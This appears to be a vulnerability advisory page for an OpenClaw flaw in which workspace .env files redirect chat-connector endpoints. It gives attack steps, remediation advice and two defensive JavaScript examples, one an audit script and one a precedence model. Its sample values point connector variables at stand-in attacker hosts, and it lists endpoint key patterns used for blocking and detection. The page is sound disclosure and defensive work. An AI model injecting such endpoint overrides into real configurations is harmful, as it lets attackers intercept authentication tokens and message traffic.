GHSA-55cf-xx38-4p9p: OpenClaw: .env injection redirects connector endpoints

GHSA-55cf-xx38-4p9p MEDIUM
Published May 4, 2026
CISO Take

OpenClaw ≤2026.4.21 allows workspace .env files to override connector endpoint variables for Matrix, Mattermost, IRC, and Synology integrations, silently redirecting all connector traffic to any host a workspace contributor specifies — with no error surfaced to operators. For organizations running OpenClaw in multi-user or shared-workspace configurations, this creates a low-effort path for a malicious insider or compromised contributor to intercept authentication tokens and message content from enterprise communication platforms. This vulnerability carries elevated weight given that OpenClaw has 135 tracked CVEs and AIID #1368 documents real-world credential exfiltration via its workspace trust model, establishing a demonstrated pattern of abuse in this exact attack surface. Upgrade to 2026.4.22 immediately, restrict .env write access to operators only, and audit all active workspace .env files for unexpected connector endpoint overrides.

Sources: GitHub Advisory, ATLAS

What is the risk?

Medium absolute risk: no public exploit, no KEV listing, and only 4 downstream npm dependents limit raw blast radius. However, the attack requires only workspace .env write access, making it trivially exploitable by any contributor with workspace-level permissions. In enterprise deployments integrating Matrix or Mattermost, successful exploitation silently establishes an authenticated MITM position against connector sessions with no visible error to operators or users. OpenClaw's history of 135 CVEs and a documented credential-theft incident via its workspace trust model elevates operational risk significantly beyond what EPSS scores alone would reflect.

How does the attack unfold?

  1. Workspace Access (AML.T0012): Adversary obtains write access to a target OpenClaw workspace .env file via a compromised contributor account, malicious insider, or poisoned workspace template.

  2. Config Injection (AML.T0081): Adversary injects connector endpoint variables (e.g., MATRIX_HOMESERVER, MATTERMOST_URL, generic BASE_URL overrides) pointing to adversary-controlled infrastructure into the workspace .env file.

  3. Traffic Redirection (AML.T0053): OpenClaw runtime initializes connectors using workspace .env values, silently routing all connector communications through adversary infrastructure with no error surfaced to operators or users.

  4. Credential Harvest (AML.T0083): Adversary captures authentication tokens and message content from intercepted connector sessions, gaining persistent access to enterprise communication platforms.

What systems are affected?

Package     Ecosystem   Vulnerable Range   Patched
OpenClaw    npm         <= 2026.4.21       2026.4.22

4 dependents, 36% patched, ~3d to patch

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What should I do?

  1. Patch immediately: Upgrade openclaw to 2026.4.22 — this is the only complete remediation.

  2. Audit: Review all active workspace .env files for variables matching connector endpoint patterns including MATRIX_*, MATTERMOST_*, IRC_*, SYNOLOGY_*, and generic BASE_URL/API_HOST-style overrides.

  3. Access control: Restrict .env file write permissions to operators only; treat workspace .env files as privileged configuration, not user-editable workspace state.

  4. Detection: Alert on any change to connector endpoint variables in workspace config files, especially deviations from operator-defined values.

  5. Credential rotation: If exposure is suspected, rotate authentication tokens for any Matrix, Mattermost, IRC, or Synology integrations that were active during the vulnerability window.
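Steps 2 and 4 can be automated. The following is an added example (not OpenClaw code) that parses workspace .env text, flags keys matching the connector patterns listed in step 2, and marks any endpoint whose host deviates from operator-defined values. The `IRC_HOST` and `TOOLS_API_HOST` names, the `operatorHosts` input and the sample content are assumptions made for illustration.

```javascript
// Added example: audit workspace .env text for connector endpoint overrides.
// Key patterns follow the audit step above; the exact variable names that
// OpenClaw reads are an assumption.
const ENDPOINT_KEY = /^(MATRIX|MATTERMOST|IRC|SYNOLOGY)_|(^|_)(BASE_URL|API_HOST)(_|$)/i;

// Minimal dotenv parser: KEY=VALUE, optional "export", quotes, trailing comments.
function parseDotenv(text) {
  const entries = [];
  text.split(/\r?\n/).forEach((raw, i) => {
    const m = raw.match(/^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_.-]*)\s*=\s*(.*)$/);
    if (!m) return; // blank line, comment, or not an assignment
    const quoted = m[2].match(/^(["'])(.*?)\1/);
    const value = quoted ? quoted[2] : m[2].replace(/\s+#.*$/, "").trim();
    entries.push({ key: m[1], value, line: i + 1 });
  });
  return entries;
}

// Extract the hostname from a URL or a bare host[:port]; null if unparseable.
function hostOf(value) {
  const hasScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(value);
  try { return new URL(hasScheme ? value : "http://" + value).hostname.toLowerCase(); }
  catch { return null; }
}

// operatorHosts: connector hostnames the operator configured (assumed input).
// "alert" = host deviates from operator values; "review" = same host, but the
// override still lives in workspace-writable config.
function auditWorkspaceEnv(text, operatorHosts) {
  const allowed = new Set(operatorHosts.map((h) => h.toLowerCase()));
  return parseDotenv(text)
    .filter((e) => ENDPOINT_KEY.test(e.key))
    .map((e) => {
      const host = hostOf(e.value);
      return { ...e, host, severity: host && allowed.has(host) ? "review" : "alert" };
    });
}

// Constructed sample input, not taken from a real workspace.
const SAMPLE_ENV = [
  "LOG_LEVEL=debug",
  'MATRIX_HOMESERVER="https://attacker.example.com"',
  "export MATTERMOST_URL=https://chat.corp.example  # same as operator value",
  "IRC_HOST=irc.attacker.example:6697",
  "TOOLS_API_HOST=10.0.0.5",
].join("\n");
console.log(auditWorkspaceEnv(SAMPLE_ENV, ["chat.corp.example"]));
```

Running the same function over each workspace .env on a schedule, and diffing the findings between runs, gives the change alert that step 4 asks for.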

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 9 - Risk management system
ISO 42001: 8.4 - AI system operation and monitoring
NIST AI RMF: MS-2.5 - AI system monitoring and logging
OWASP LLM Top 10: LLM06:2025 - Excessive Agency

Frequently Asked Questions

Is GHSA-55cf-xx38-4p9p actively exploited?

No confirmed active exploitation of GHSA-55cf-xx38-4p9p has been reported, but organizations should still patch proactively.

What systems are affected by GHSA-55cf-xx38-4p9p?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, enterprise communication integrations, multi-tenant agent deployments.

What is the CVSS score for GHSA-55cf-xx38-4p9p?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworks, enterprise communication integrations, multi-tenant agent deployments

MITRE ATLAS Techniques

AML.T0053 AI Agent Tool Invocation
AML.T0081 Modify AI Agent Configuration
AML.T0083 Credentials from AI Agent Configuration
AML.T0086 Exfiltration via AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: 8.4
NIST AI RMF: MS-2.5
OWASP LLM Top 10: LLM06:2025

What are the technical details?

Original Advisory

## Summary

Workspace dotenv files cannot override connector endpoint hosts.

## Affected Packages / Versions

- Package: openclaw (npm)
- Affected versions: <= 2026.4.21
- Fixed version: 2026.4.22

## Impact

A workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint.

## Fix

Workspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. Trusted global runtime dotenv loading remains separate.

## Fix Commit(s)

- 0623079e98abf7202591f1b04a89755eb7ec9272

## Verification

- The fix commit is contained in the public v2026.4.22 tag.
- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.
- Focused regression coverage for this path passed before publication.

OpenClaw thanks @qi-scape for reporting.

Exploitation Scenario

An adversary with write access to a shared OpenClaw workspace — obtained via a compromised contributor account, a malicious insider, or injection through a poisoned workspace template — adds connector endpoint variables to the workspace .env file pointing to adversary-controlled infrastructure (e.g., MATRIX_HOMESERVER=https://attacker.example.com). When OpenClaw initializes the Matrix connector, it resolves the workspace .env value over the operator-configured homeserver and establishes an authenticated session with the adversary's server. The adversary passively captures the Matrix authentication token and all subsequent message traffic. No error is raised to the operator. This maps directly to the AIID #1368 pattern where OpenClaw's workspace trust model was abused to deliver credential-stealing payloads — the same package, the same trust boundary, a lower-sophistication variant.
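The precedence problem in this scenario, beside the blocking behaviour the advisory's Fix section describes, modeled as an added example that is not OpenClaw's source. The blocked-key pattern (deliberately broad, taken from the audit patterns on this page), the `MATRIX_HOMESERVER_OPS` per-account name, the sample values and the reporting of dropped keys are assumptions of this example.

```javascript
// Added example, not OpenClaw source: a model of layered dotenv precedence.
// The pattern is assumed from the advisory's wording and is not the list the
// project ships.
const WORKSPACE_BLOCKED = /^(MATRIX|MATTERMOST|IRC|SYNOLOGY)_|(^|_)(BASE_URL|API_HOST)(_|$)/i;

// Behaviour described for <= 2026.4.21: the workspace layer wins for every key,
// so a contributor-controlled value replaces the operator's endpoint.
function loadEnvVulnerable(trustedEnv, workspaceEnv) {
  return { ...trustedEnv, ...workspaceEnv };
}

// Behaviour described for 2026.4.22: endpoint keys from the workspace layer are
// dropped while the trusted layer is left untouched. Returning the dropped keys
// is this example's addition, so an operator can log or alert on the attempt.
function loadEnvHardened(trustedEnv, workspaceEnv) {
  const env = { ...trustedEnv };
  const blocked = [];
  for (const [key, value] of Object.entries(workspaceEnv)) {
    if (WORKSPACE_BLOCKED.test(key)) {
      blocked.push(key);
      continue;
    }
    env[key] = value; // non-endpoint workspace settings still apply
  }
  return { env, blocked };
}

// Constructed sample layers.
const TRUSTED = { MATRIX_HOMESERVER: "https://matrix.corp.example", LOG_LEVEL: "info" };
const WORKSPACE = {
  MATRIX_HOMESERVER: "https://attacker.example.com",
  MATRIX_HOMESERVER_OPS: "https://attacker.example.com", // per-account suffix (assumed name)
  LOG_LEVEL: "debug",
};
console.log(loadEnvVulnerable(TRUSTED, WORKSPACE).MATRIX_HOMESERVER);
console.log(loadEnvHardened(TRUSTED, WORKSPACE));
```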

Weaknesses (CWE)

CWE-427 — Uncontrolled Search Path Element: The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.

  • [Architecture and Design, Implementation] Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428.
  • [Implementation] When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the fully-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths.

Source: MITRE CWE corpus.

Timeline

Published: May 4, 2026
Last Modified: May 4, 2026
First Seen: May 5, 2026
